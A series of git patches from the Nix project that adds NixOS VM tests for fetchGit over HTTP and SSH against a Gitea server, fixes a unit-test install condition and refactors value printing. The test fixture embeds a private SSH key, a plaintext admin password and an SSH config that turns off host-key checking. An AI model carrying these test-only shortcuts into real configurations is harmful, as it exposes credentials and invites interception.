4459aa664..1a42f886c 100644 --- a/tests/nixos/default.nix +++ b/tests/nixos/default.nix @@ -5,14 +5,28 @@ let nixos-lib = import (nixpkgs + "/nixos/lib") { }; # https://nixos.org/manual/nixos/unstable/index.html#sec-calling-nixos-tests - runNixOSTestFor = system: test: nixos-lib.runTest { - imports = [ test ]; - hostPkgs = nixpkgsFor.${system}.native; - defaults = { - nixpkgs.pkgs = nixpkgsFor.${system}.native; + runNixOSTestFor = system: test: + (nixos-lib.runTest { + imports = [ test ]; + hostPkgs = nixpkgsFor.${system}.native; + defaults = { + nixpkgs.pkgs = nixpkgsFor.${system}.native; + nix.checkAllErrors = false; + }; + _module.args.nixpkgs = nixpkgs; + _module.args.system = system; + }) + // { + # allow running tests against older nix versions via `nix eval --apply` + # Example: + # nix build "$(nix eval --raw --impure .#hydraJobs.tests.fetch-git --apply 't: (t.forNix "2.19.2").drvPath')^*" + forNix = nixVersion: runNixOSTestFor system { + imports = [test]; + defaults.nixpkgs.overlays = [(curr: prev: { + nix = (builtins.getFlake "nix/${nixVersion}").packages.${system}.nix; + })]; + }; }; - _module.args.nixpkgs = nixpkgs; - }; in @@ -40,4 +54,6 @@ in setuid = lib.genAttrs ["i686-linux" "x86_64-linux"] (system: runNixOSTestFor system ./setuid.nix); + + fetch-git = runNixOSTestFor "x86_64-linux" ./fetch-git; } diff --git a/tests/nixos/fetch-git/default.nix b/tests/nixos/fetch-git/default.nix new file mode 100644 index 000000000..abeefb0e3 --- /dev/null +++ b/tests/nixos/fetch-git/default.nix @@ -0,0 +1,60 @@ +{ lib, config, ... }: +{ + name = "fetch-git"; + + imports = [ + ./testsupport/gitea.nix + ]; + + /* + Test cases + The following is set up automatically for each test case: + - a repo with the {name} is created on the gitea server + - a repo with the {name} is created on the client + - the client repo is configured to push to the server repo + Python variables: + - repo.path: the path to the directory of the client repo + - repo.git: the git command with the client repo as the working directory + - repo.remote: the url to the server repo + */ + testCases = [ + { + name = "simple-http"; + description = "can fetch a git repo via http"; + script = '' + # add a file to the repo + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' + """) + + # memoize the revision + rev1 = client.succeed(f""" + {repo.git} rev-parse HEAD + """).strip() + + # push to the server + client.succeed(f""" + {repo.git} push origin main + """) + + # fetch the repo via nix + fetched1 = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).outPath" + """) + + # check if the committed file is there + client.succeed(f""" + test -f {fetched1}/thailand + """) + + # check if the revision is the same + rev1_fetched = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).rev" + """).strip() + assert rev1 == rev1_fetched + ''; + } + ]; +} diff --git a/tests/nixos/fetch-git/testsupport/gitea.nix b/tests/nixos/fetch-git/testsupport/gitea.nix new file mode 100644 index 000000000..d2bd622e4 --- /dev/null +++ b/tests/nixos/fetch-git/testsupport/gitea.nix @@ -0,0 +1,63 @@ +{ lib, nixpkgs, system, ... }: { + imports = [ + ../testsupport/setup.nix + ]; + nodes = { + gitea = { pkgs, ... }: { + services.gitea.enable = true; + services.gitea.settings.service.DISABLE_REGISTRATION = true; + services.gitea.settings.log.LEVEL = "Info"; + services.gitea.settings.database.LOG_SQL = false; + networking.firewall.allowedTCPPorts = [ 3000 ]; + environment.systemPackages = [ pkgs.gitea ]; + + # TODO: remove this after updating to nixos-23.11 + nixpkgs.pkgs = lib.mkForce (import nixpkgs { + inherit system; + config.permittedInsecurePackages = [ + "gitea-1.19.4" + ]; + }); + }; + client = { pkgs, ... }: { + environment.systemPackages = [ pkgs.git ]; + }; + }; + defaults = { pkgs, ... }: { + environment.systemPackages = [ pkgs.jq ]; + }; + + setupScript = '' + import shlex + + gitea.wait_for_unit("gitea.service") + + gitea_admin = "test" + gitea_admin_password = "test123test" + + gitea.succeed(f""" + gitea --version >&2 + su -l gitea -c 'GITEA_WORK_DIR=/var/lib/gitea gitea admin user create \ + --username {gitea_admin} --password {gitea_admin_password} --email test@client' + """) + + client.wait_for_unit("multi-user.target") + gitea.wait_for_open_port(3000) + + gitea_admin_token = gitea.succeed(f""" + curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/users/test/tokens \ + -H 'Accept: application/json' -H 'Content-Type: application/json' \ + -d {shlex.quote( '{"name":"token", "scopes":["all"]}' )} \ + | jq -r '.sha1' + """).strip() + + client.succeed(f""" + echo "http://{gitea_admin}:{gitea_admin_password}@gitea:3000" >~/.git-credentials-admin + git config --global credential.helper 'store --file ~/.git-credentials-admin' + git config --global user.email "test@client" + git config --global user.name "Test User" + git config --global gc.autodetach 0 + git config --global gc.auto 0 + """) + ''; +} diff --git a/tests/nixos/fetch-git/testsupport/setup.nix b/tests/nixos/fetch-git/testsupport/setup.nix new file mode 100644 index 000000000..f2fbd737d --- /dev/null +++ b/tests/nixos/fetch-git/testsupport/setup.nix @@ -0,0 +1,106 @@ +{ lib, config, extendModules, ... }: +let + inherit (lib) + mkOption + types + ; + + indent = lib.replaceStrings ["\n"] ["\n "]; + + execTestCase = testCase: '' + + ### TEST ${testCase.name}: ${testCase.description} ### + + with subtest("${testCase.description}"): + repo = Repo("${testCase.name}") + ${indent testCase.script} + ''; +in +{ + + options = { + setupScript = mkOption { + type = types.lines; + description = '' + Python code that runs before the main test. + + Variables defined by this code will be available in the test. + ''; + default = ""; + }; + testCases = mkOption { + description = '' + The test cases. See `testScript`. + ''; + type = types.listOf (types.submodule { + options.name = mkOption { + type = types.str; + description = '' + The name of the test case. + + A repository with that name will be set up on the gitea server and locally. + + This name can also be used to execute only a single test case via: + `nix build .#hydraJobs.fetch-git.{test-case-name}` + ''; + }; + options.description = mkOption { + type = types.str; + description = '' + A description of the test case. + ''; + }; + options.script = mkOption { + type = types.lines; + description = '' + Python code that runs the test. + + Variables defined by `setupScript` will be available here. + ''; + }; + }); + }; + }; + + config = { + nodes.client = { + environment.variables = { + _NIX_FORCE_HTTP = "1"; + }; + nix.settings.experimental-features = ["nix-command" "flakes"]; + }; + setupScript = '' + class Repo: + """ + A class to create a git repository on the gitea server and locally. + """ + def __init__(self, name): + self.name = name + self.path = "/tmp/repos/" + name + self.remote = "http://gitea:3000/test/" + name + self.git = f"git -C {self.path}" + self.create() + + def create(self): + gitea.succeed(f""" + curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/user/repos \ + -H 'Accept: application/json' -H 'Content-Type: application/json' \ + -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main"}}' )} + """) + client.succeed(f""" + mkdir -p {self.path} \ + && git init -b main {self.path} \ + && {self.git} remote add origin {self.remote} + """) + ''; + testScript = '' + start_all(); + + ${config.setupScript} + + ### SETUP COMPLETE ### + + ${lib.concatStringsSep "\n" (map execTestCase config.testCases)} + ''; + }; +} From 0f95330fde6ebad95b5a50be3aacb0a1d11363af Mon Sep 17 00:00:00 2001 From: DavHau Date: Thu, 11 Jan 2024 14:41:35 +0700 Subject: [PATCH 216/654] fetchGit: add simple test for ssh fetching Also move tests to separate files which are auto-imported. This should allow people adding tests concurrently without introducing merge conflicts --- tests/nixos/fetch-git/default.nix | 52 +++++-------------- .../test-cases/http-simple/default.nix | 37 +++++++++++++ .../test-cases/ssh-simple/default.nix | 41 +++++++++++++++ tests/nixos/fetch-git/testsupport/gitea.nix | 41 ++++++++++++++- tests/nixos/fetch-git/testsupport/setup.nix | 10 +++- 5 files changed, 138 insertions(+), 43 deletions(-) create mode 100644 tests/nixos/fetch-git/test-cases/http-simple/default.nix create mode 100644 tests/nixos/fetch-git/test-cases/ssh-simple/default.nix diff --git a/tests/nixos/fetch-git/default.nix b/tests/nixos/fetch-git/default.nix index abeefb0e3..254fecaaf 100644 --- a/tests/nixos/fetch-git/default.nix +++ b/tests/nixos/fetch-git/default.nix @@ -8,53 +8,25 @@ /* Test cases + + Test cases are automatically imported from ./test-cases/{name} + The following is set up automatically for each test case: - a repo with the {name} is created on the gitea server - a repo with the {name} is created on the client - the client repo is configured to push to the server repo + Python variables: - repo.path: the path to the directory of the client repo - repo.git: the git command with the client repo as the working directory - repo.remote: the url to the server repo */ - testCases = [ - { - name = "simple-http"; - description = "can fetch a git repo via http"; - script = '' - # add a file to the repo - client.succeed(f""" - echo chiang-mai > {repo.path}/thailand \ - && {repo.git} add thailand \ - && {repo.git} commit -m 'commit1' - """) - - # memoize the revision - rev1 = client.succeed(f""" - {repo.git} rev-parse HEAD - """).strip() - - # push to the server - client.succeed(f""" - {repo.git} push origin main - """) - - # fetch the repo via nix - fetched1 = client.succeed(f""" - nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).outPath" - """) - - # check if the committed file is there - client.succeed(f""" - test -f {fetched1}/thailand - """) - - # check if the revision is the same - rev1_fetched = client.succeed(f""" - nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).rev" - """).strip() - assert rev1 == rev1_fetched - ''; - } - ]; + testCases = + map + (testCaseName: {...}: { + imports = ["${./test-cases}/${testCaseName}"]; + # ensures tests are named like their directories they are defined in + name = testCaseName; + }) + (lib.attrNames (builtins.readDir ./test-cases)); } diff --git a/tests/nixos/fetch-git/test-cases/http-simple/default.nix b/tests/nixos/fetch-git/test-cases/http-simple/default.nix new file mode 100644 index 000000000..1bd5bbba2 --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/http-simple/default.nix @@ -0,0 +1,37 @@ +{ + description = "can fetch a git repo via http"; + script = '' + # add a file to the repo + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' + """) + + # memoize the revision + rev1 = client.succeed(f""" + {repo.git} rev-parse HEAD + """).strip() + + # push to the server + client.succeed(f""" + {repo.git} push origin main + """) + + # fetch the repo via nix + fetched1 = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).outPath" + """) + + # check if the committed file is there + client.succeed(f""" + test -f {fetched1}/thailand + """) + + # check if the revision is the same + rev1_fetched = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).rev" + """).strip() + assert rev1 == rev1_fetched, f"rev1: {rev1} != rev1_fetched: {rev1_fetched}" + ''; +} diff --git a/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix new file mode 100644 index 000000000..0e4494ae0 --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix @@ -0,0 +1,41 @@ +{ + description = "can fetch a git repo via ssh"; + script = '' + # add a file to the repo + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' + """) + + # memoize the revision + rev1 = client.succeed(f""" + {repo.git} rev-parse HEAD + """).strip() + + # push to the server + client.succeed(f""" + {repo.git} push origin-ssh main + """) + + # fetch the repo via nix + fetched1 = client.succeed(f""" + nix eval --impure --raw --expr ' + (builtins.fetchGit "{repo.remote_ssh}").outPath + ' + """) + + # check if the committed file is there + client.succeed(f""" + test -f {fetched1}/thailand + """) + + # check if the revision is the same + rev1_fetched = client.succeed(f""" + nix eval --impure --raw --expr ' + (builtins.fetchGit "{repo.remote_ssh}").rev + ' + """).strip() + assert rev1 == rev1_fetched, f"rev1: {rev1} != rev1_fetched: {rev1_fetched}" + ''; +} diff --git a/tests/nixos/fetch-git/testsupport/gitea.nix b/tests/nixos/fetch-git/testsupport/gitea.nix index d2bd622e4..2ea23961e 100644 --- a/tests/nixos/fetch-git/testsupport/gitea.nix +++ b/tests/nixos/fetch-git/testsupport/gitea.nix @@ -1,4 +1,18 @@ -{ lib, nixpkgs, system, ... }: { +{ lib, nixpkgs, system, pkgs, ... }: let + clientPrivateKey = pkgs.writeText "id_ed25519" '' + -----BEGIN OPENSSH PRIVATE KEY----- + b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW + QyNTUxOQAAACBbeWvHh/AWGWI6EIc1xlSihyXtacNQ9KeztlW/VUy8wQAAAJAwVQ5VMFUO + VQAAAAtzc2gtZWQyNTUxOQAAACBbeWvHh/AWGWI6EIc1xlSihyXtacNQ9KeztlW/VUy8wQ + AAAEB7lbfkkdkJoE+4TKHPdPQWBKLSx+J54Eg8DaTr+3KoSlt5a8eH8BYZYjoQhzXGVKKH + Je1pw1D0p7O2Vb9VTLzBAAAACGJmb0BtaW5pAQIDBAU= + -----END OPENSSH PRIVATE KEY----- + ''; + + clientPublicKey = + "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFt5a8eH8BYZYjoQhzXGVKKHJe1pw1D0p7O2Vb9VTLzB"; + +in { imports = [ ../testsupport/setup.nix ]; @@ -8,8 +22,11 @@ services.gitea.settings.service.DISABLE_REGISTRATION = true; services.gitea.settings.log.LEVEL = "Info"; services.gitea.settings.database.LOG_SQL = false; + services.openssh.enable = true; networking.firewall.allowedTCPPorts = [ 3000 ]; - environment.systemPackages = [ pkgs.gitea ]; + environment.systemPackages = [ pkgs.git pkgs.gitea ]; + + users.users.root.openssh.authorizedKeys.keys = [clientPublicKey]; # TODO: remove this after updating to nixos-23.11 nixpkgs.pkgs = lib.mkForce (import nixpkgs { @@ -59,5 +76,25 @@ git config --global gc.autodetach 0 git config --global gc.auto 0 """) + + # add client's private key to ~/.ssh + client.succeed(""" + mkdir -p ~/.ssh + chmod 700 ~/.ssh + cat ${clientPrivateKey} >~/.ssh/id_ed25519 + chmod 600 ~/.ssh/id_ed25519 + """) + + client.succeed(""" + echo "Host gitea" >>~/.ssh/config + echo " StrictHostKeyChecking no" >>~/.ssh/config + echo " UserKnownHostsFile /dev/null" >>~/.ssh/config + echo " User root" >>~/.ssh/config + """) + + # ensure ssh from client to gitea works + client.succeed(""" + ssh root@gitea true + """) ''; } diff --git a/tests/nixos/fetch-git/testsupport/setup.nix b/tests/nixos/fetch-git/testsupport/setup.nix index f2fbd737d..2f74f51f8 100644 --- a/tests/nixos/fetch-git/testsupport/setup.nix +++ b/tests/nixos/fetch-git/testsupport/setup.nix @@ -78,19 +78,27 @@ in self.name = name self.path = "/tmp/repos/" + name self.remote = "http://gitea:3000/test/" + name + self.remote_ssh = "ssh://gitea/root/" + name self.git = f"git -C {self.path}" self.create() def create(self): + # create ssh remote repo + gitea.succeed(f""" + git init --bare -b main /root/{self.name} + """) + # create http remote repo gitea.succeed(f""" curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/user/repos \ -H 'Accept: application/json' -H 'Content-Type: application/json' \ -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main"}}' )} """) + # setup git remotes on client client.succeed(f""" mkdir -p {self.path} \ && git init -b main {self.path} \ - && {self.git} remote add origin {self.remote} + && {self.git} remote add origin {self.remote} \ + && {self.git} remote add origin-ssh root@gitea:{self.name} """) ''; testScript = '' From a923444a9462cd2fabcd816fa2e9cb54c485f13f Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 11 Jan 2024 13:55:28 -0500 Subject: [PATCH 217/654] packages.nix: Fix `installUnitTests` condition The intent was we install the tests when we can *not* run them. Instead, we were installing them when we can. --- package.nix | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/package.nix b/package.nix index 71ee80e33..37410dc2f 100644 --- a/package.nix +++ b/package.nix @@ -100,7 +100,7 @@ # Whether to install unit tests. This is useful when cross compiling # since we cannot run them natively during the build, but can do so # later. -, installUnitTests ? __forDefaults.canRunInstalled +, installUnitTests ? doBuild && !__forDefaults.canExecuteHost # For running the functional tests against a pre-built Nix. Probably # want to use in conjunction with `doBuild = false;`. @@ -113,7 +113,8 @@ # Not a real argument, just the only way to approximate let-binding some # stuff for argument defaults. , __forDefaults ? { - canRunInstalled = doBuild && stdenv.buildPlatform.canExecute stdenv.hostPlatform; + canExecuteHost = stdenv.buildPlatform.canExecute stdenv.hostPlatform; + canRunInstalled = doBuild && __forDefaults.canExecuteHost; } }: From c9125603a535f82cc9a53f47533f0a3d174e7008 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 18 Dec 2023 10:34:19 -0800 Subject: [PATCH 218/654] Unindent `print.hh` declarations --- src/libexpr/print.hh | 82 +++++++++++++++++++++++--------------------- 1 file changed, 42 insertions(+), 40 deletions(-) diff --git a/src/libexpr/print.hh b/src/libexpr/print.hh index 3b72ae201..abf830864 100644 --- a/src/libexpr/print.hh +++ b/src/libexpr/print.hh @@ -10,45 +10,47 @@ #include namespace nix { - /** - * Print a string as a Nix string literal. - * - * Quotes and fairly minimal escaping are added. - * - * @param s The logical string - */ - std::ostream & printLiteralString(std::ostream & o, std::string_view s); - inline std::ostream & printLiteralString(std::ostream & o, const char * s) { - return printLiteralString(o, std::string_view(s)); - } - inline std::ostream & printLiteralString(std::ostream & o, const std::string & s) { - return printLiteralString(o, std::string_view(s)); - } - /** Print `true` or `false`. */ - std::ostream & printLiteralBool(std::ostream & o, bool b); - - /** - * Print a string as an attribute name in the Nix expression language syntax. - * - * Prints a quoted string if necessary. - */ - std::ostream & printAttributeName(std::ostream & o, std::string_view s); - - /** - * Returns `true' is a string is a reserved keyword which requires quotation - * when printing attribute set field names. - */ - bool isReservedKeyword(const std::string_view str); - - /** - * Print a string as an identifier in the Nix expression language syntax. - * - * FIXME: "identifier" is ambiguous. Identifiers do not have a single - * textual representation. They can be used in variable references, - * let bindings, left-hand sides or attribute names in a select - * expression, or something else entirely, like JSON. Use one of the - * `print*` functions instead. - */ - std::ostream & printIdentifier(std::ostream & o, std::string_view s); +/** + * Print a string as a Nix string literal. + * + * Quotes and fairly minimal escaping are added. + * + * @param s The logical string + */ +std::ostream & printLiteralString(std::ostream & o, std::string_view s); +inline std::ostream & printLiteralString(std::ostream & o, const char * s) { + return printLiteralString(o, std::string_view(s)); +} +inline std::ostream & printLiteralString(std::ostream & o, const std::string & s) { + return printLiteralString(o, std::string_view(s)); +} + +/** Print `true` or `false`. */ +std::ostream & printLiteralBool(std::ostream & o, bool b); + +/** + * Print a string as an attribute name in the Nix expression language syntax. + * + * Prints a quoted string if necessary. + */ +std::ostream & printAttributeName(std::ostream & o, std::string_view s); + +/** + * Returns `true' is a string is a reserved keyword which requires quotation + * when printing attribute set field names. + */ +bool isReservedKeyword(const std::string_view str); + +/** + * Print a string as an identifier in the Nix expression language syntax. + * + * FIXME: "identifier" is ambiguous. Identifiers do not have a single + * textual representation. They can be used in variable references, + * let bindings, left-hand sides or attribute names in a select + * expression, or something else entirely, like JSON. Use one of the + * `print*` functions instead. + */ +std::ostream & printIdentifier(std::ostream & o, std::string_view s); + } From 0fa08b451682fb3311fe58112ff05c4fe5bee3a4 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Tue, 12 Dec 2023 13:57:36 -0800 Subject: [PATCH 219/654] Unify and refactor value printing Previously, there were two mostly-identical value printers -- one in `libexpr/eval.cc` (which didn't force values) and one in `libcmd/repl.cc` (which did force values and also printed ANSI color codes). This PR unifies both of these printers into `print.cc` and provides a `PrintOptions` struct for controlling the output, which allows for toggling whether values are forced, whether repeated values are tracked, and whether ANSI color codes are displayed. Additionally, `PrintOptions` allows tuning the maximum number of attributes, list items, and bytes in a string that will be displayed; this makes it ideal for contexts where printing too much output (e.g. all of Nixpkgs) is distracting. (As requested by @roberth in https://github.com/NixOS/nix/pull/9554#issuecomment-1845095735) Please read the tests for example output. Future work: - It would be nice to provide this function as a builtin, perhaps `builtins.toStringDebug` -- a printing function that never fails would be useful when debugging Nix code. - It would be nice to support customizing `PrintOptions` members on the command line, e.g. `--option to-string-max-attrs 1000`. --- src/libcmd/repl.cc | 158 +---- src/libexpr/eval.cc | 126 +--- src/libexpr/eval.hh | 4 +- src/libexpr/print-options.hh | 52 ++ src/libexpr/print.cc | 416 +++++++++++- src/libexpr/print.hh | 6 + src/libexpr/value.hh | 17 +- src/libutil/english.cc | 18 + src/libutil/english.hh | 18 + src/nix-env/user-env.cc | 5 +- src/nix-instantiate/nix-instantiate.cc | 2 +- tests/functional/lang/eval-okay-print.err.exp | 2 +- tests/functional/lang/eval-okay-print.exp | 2 +- .../lang/eval-okay-repeated-empty-attrs.exp | 1 + .../lang/eval-okay-repeated-empty-attrs.nix | 2 + .../lang/eval-okay-repeated-empty-list.exp | 1 + .../lang/eval-okay-repeated-empty-list.nix | 1 + tests/unit/libexpr/value/print.cc | 621 +++++++++++++++++- 18 files changed, 1174 insertions(+), 278 deletions(-) create mode 100644 src/libexpr/print-options.hh create mode 100644 src/libutil/english.cc create mode 100644 src/libutil/english.hh create mode 100644 tests/functional/lang/eval-okay-repeated-empty-attrs.exp create mode 100644 tests/functional/lang/eval-okay-repeated-empty-attrs.nix create mode 100644 tests/functional/lang/eval-okay-repeated-empty-list.exp create mode 100644 tests/functional/lang/eval-okay-repeated-empty-list.nix diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 7a1df74ef..72e3559df 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -93,9 +93,17 @@ struct NixRepl void evalString(std::string s, Value & v); void loadDebugTraceEnv(DebugTrace & dt); - typedef std::set ValuesSeen; - std::ostream & printValue(std::ostream & str, Value & v, unsigned int maxDepth); - std::ostream & printValue(std::ostream & str, Value & v, unsigned int maxDepth, ValuesSeen & seen); + void printValue(std::ostream & str, + Value & v, + unsigned int maxDepth = std::numeric_limits::max()) + { + ::nix::printValue(*state, str, v, PrintOptions { + .ansiColors = true, + .force = true, + .derivationPaths = true, + .maxDepth = maxDepth + }); + } }; std::string removeWhitespace(std::string s) @@ -708,7 +716,8 @@ bool NixRepl::processLine(std::string line) else if (command == ":p" || command == ":print") { Value v; evalString(arg, v); - printValue(std::cout, v, 1000000000) << std::endl; + printValue(std::cout, v); + std::cout << std::endl; } else if (command == ":q" || command == ":quit") { @@ -770,7 +779,8 @@ bool NixRepl::processLine(std::string line) } else { Value v; evalString(line, v); - printValue(std::cout, v, 1) << std::endl; + printValue(std::cout, v, 1); + std::cout << std::endl; } } @@ -892,144 +902,6 @@ void NixRepl::evalString(std::string s, Value & v) } -std::ostream & NixRepl::printValue(std::ostream & str, Value & v, unsigned int maxDepth) -{ - ValuesSeen seen; - return printValue(str, v, maxDepth, seen); -} - - - - -// FIXME: lot of cut&paste from Nix's eval.cc. -std::ostream & NixRepl::printValue(std::ostream & str, Value & v, unsigned int maxDepth, ValuesSeen & seen) -{ - str.flush(); - checkInterrupt(); - - state->forceValue(v, v.determinePos(noPos)); - - switch (v.type()) { - - case nInt: - str << ANSI_CYAN << v.integer << ANSI_NORMAL; - break; - - case nBool: - str << ANSI_CYAN; - printLiteralBool(str, v.boolean); - str << ANSI_NORMAL; - break; - - case nString: - str << ANSI_WARNING; - printLiteralString(str, v.string_view()); - str << ANSI_NORMAL; - break; - - case nPath: - str << ANSI_GREEN << v.path().to_string() << ANSI_NORMAL; // !!! escaping? - break; - - case nNull: - str << ANSI_CYAN "null" ANSI_NORMAL; - break; - - case nAttrs: { - seen.insert(&v); - - bool isDrv = state->isDerivation(v); - - if (isDrv) { - str << "«derivation "; - Bindings::iterator i = v.attrs->find(state->sDrvPath); - NixStringContext context; - if (i != v.attrs->end()) - str << state->store->printStorePath(state->coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation")); - else - str << "???"; - str << "»"; - } - - else if (maxDepth > 0) { - str << "{ "; - - typedef std::map Sorted; - Sorted sorted; - for (auto & i : *v.attrs) - sorted.emplace(state->symbols[i.name], i.value); - - for (auto & i : sorted) { - printAttributeName(str, i.first); - str << " = "; - if (seen.count(i.second)) - str << "«repeated»"; - else - try { - printValue(str, *i.second, maxDepth - 1, seen); - } catch (AssertionError & e) { - str << ANSI_RED "«error: " << e.msg() << "»" ANSI_NORMAL; - } - str << "; "; - } - - str << "}"; - } else - str << "{ ... }"; - - break; - } - - case nList: - seen.insert(&v); - - str << "[ "; - if (maxDepth > 0) - for (auto elem : v.listItems()) { - if (seen.count(elem)) - str << "«repeated»"; - else - try { - printValue(str, *elem, maxDepth - 1, seen); - } catch (AssertionError & e) { - str << ANSI_RED "«error: " << e.msg() << "»" ANSI_NORMAL; - } - str << " "; - } - else - str << "... "; - str << "]"; - break; - - case nFunction: - if (v.isLambda()) { - std::ostringstream s; - s << state->positions[v.lambda.fun->pos]; - str << ANSI_BLUE "«lambda @ " << filterANSIEscapes(s.str()) << "»" ANSI_NORMAL; - } else if (v.isPrimOp()) { - str << ANSI_MAGENTA "«primop»" ANSI_NORMAL; - } else if (v.isPrimOpApp()) { - str << ANSI_BLUE "«primop-app»" ANSI_NORMAL; - } else { - abort(); - } - break; - - case nFloat: - str << v.fpoint; - break; - - case nThunk: - case nExternal: - default: - str << ANSI_RED "«unknown»" ANSI_NORMAL; - break; - } - - return str; -} - - std::unique_ptr AbstractNixRepl::create( const SearchPath & searchPath, nix::ref store, ref state, std::function getValues) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index d408f1adc..0659a2173 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -105,117 +105,23 @@ RootValue allocRootValue(Value * v) #endif } -void Value::print(const SymbolTable &symbols, std::ostream &str, - std::set *seen, int depth) const - -{ - checkInterrupt(); - - if (depth <= 0) { - str << "«too deep»"; - return; - } - switch (internalType) { - case tInt: - str << integer; - break; - case tBool: - printLiteralBool(str, boolean); - break; - case tString: - printLiteralString(str, string_view()); - break; - case tPath: - str << path().to_string(); // !!! escaping? - break; - case tNull: - str << "null"; - break; - case tAttrs: { - if (seen && !attrs->empty() && !seen->insert(attrs).second) - str << "«repeated»"; - else { - str << "{ "; - for (auto & i : attrs->lexicographicOrder(symbols)) { - str << symbols[i->name] << " = "; - i->value->print(symbols, str, seen, depth - 1); - str << "; "; - } - str << "}"; - } - break; - } - case tList1: - case tList2: - case tListN: - if (seen && listSize() && !seen->insert(listElems()).second) - str << "«repeated»"; - else { - str << "[ "; - for (auto v2 : listItems()) { - if (v2) - v2->print(symbols, str, seen, depth - 1); - else - str << "(nullptr)"; - str << " "; - } - str << "]"; - } - break; - case tThunk: - case tApp: - if (!isBlackhole()) { - str << ""; - } else { - // Although we know for sure that it's going to be an infinite recursion - // when this value is accessed _in the current context_, it's likely - // that the user will misinterpret a simpler «infinite recursion» output - // as a definitive statement about the value, while in fact it may be - // a valid value after `builtins.trace` and perhaps some other steps - // have completed. - str << "«potential infinite recursion»"; - } - break; - case tLambda: - str << ""; - break; - case tPrimOp: - str << ""; - break; - case tPrimOpApp: - str << ""; - break; - case tExternal: - str << *external; - break; - case tFloat: - str << fpoint; - break; - default: - printError("Nix evaluator internal error: Value::print(): invalid value type %1%", internalType); - abort(); - } -} - -void Value::print(const SymbolTable &symbols, std::ostream &str, - bool showRepeated, int depth) const { - std::set seen; - print(symbols, str, showRepeated ? nullptr : &seen, depth); -} - // Pretty print types for assertion errors std::ostream & operator << (std::ostream & os, const ValueType t) { os << showType(t); return os; } -std::string printValue(const EvalState & state, const Value & v) +std::string printValue(EvalState & state, Value & v) { std::ostringstream out; - v.print(state.symbols, out); + v.print(state, out); return out.str(); } +void Value::print(EvalState & state, std::ostream & str, PrintOptions options) +{ + printValue(state, str, *this, options); +} const Value * getPrimOp(const Value &v) { const Value * primOp = &v; @@ -710,6 +616,26 @@ void PrimOp::check() } +std::ostream & operator<<(std::ostream & output, PrimOp & primOp) +{ + output << "primop " << primOp.name; + return output; +} + + +PrimOp * Value::primOpAppPrimOp() const +{ + Value * left = primOpApp.left; + while (left && !left->isPrimOp()) { + left = left->primOpApp.left; + } + + if (!left) + return nullptr; + return left->primOp; +} + + void Value::mkPrimOp(PrimOp * p) { p->check(); diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 5e0f1886d..9141156b1 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -84,6 +84,8 @@ struct PrimOp void check(); }; +std::ostream & operator<<(std::ostream & output, PrimOp & primOp); + /** * Info about a constant */ @@ -127,7 +129,7 @@ std::unique_ptr mapStaticEnvBindings(const SymbolTable & st, const Stati void copyContext(const Value & v, NixStringContext & context); -std::string printValue(const EvalState & state, const Value & v); +std::string printValue(EvalState & state, Value & v); std::ostream & operator << (std::ostream & os, const ValueType t); diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh new file mode 100644 index 000000000..11ff9ae87 --- /dev/null +++ b/src/libexpr/print-options.hh @@ -0,0 +1,52 @@ +#pragma once +/** + * @file + * @brief Options for printing Nix values. + */ + +#include + +namespace nix { + +/** + * Options for printing Nix values. + */ +struct PrintOptions +{ + /** + * If true, output ANSI color sequences. + */ + bool ansiColors = false; + /** + * If true, force values. + */ + bool force = false; + /** + * If true and `force` is set, print derivations as + * `«derivation /nix/store/...»` instead of as attribute sets. + */ + bool derivationPaths = false; + /** + * If true, track which values have been printed and skip them on + * subsequent encounters. Useful for self-referential values. + */ + bool trackRepeated = true; + /** + * Maximum depth to evaluate to. + */ + size_t maxDepth = std::numeric_limits::max(); + /** + * Maximum number of attributes in an attribute set to print. + */ + size_t maxAttrs = std::numeric_limits::max(); + /** + * Maximum number of list items to print. + */ + size_t maxListItems = std::numeric_limits::max(); + /** + * Maximum string length to print. + */ + size_t maxStringLength = std::numeric_limits::max(); +}; + +} diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 53ba70bdd..db26ed4c2 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -1,24 +1,66 @@ -#include "print.hh" +#include #include +#include "print.hh" +#include "ansicolor.hh" +#include "signals.hh" +#include "store-api.hh" +#include "terminal.hh" +#include "english.hh" 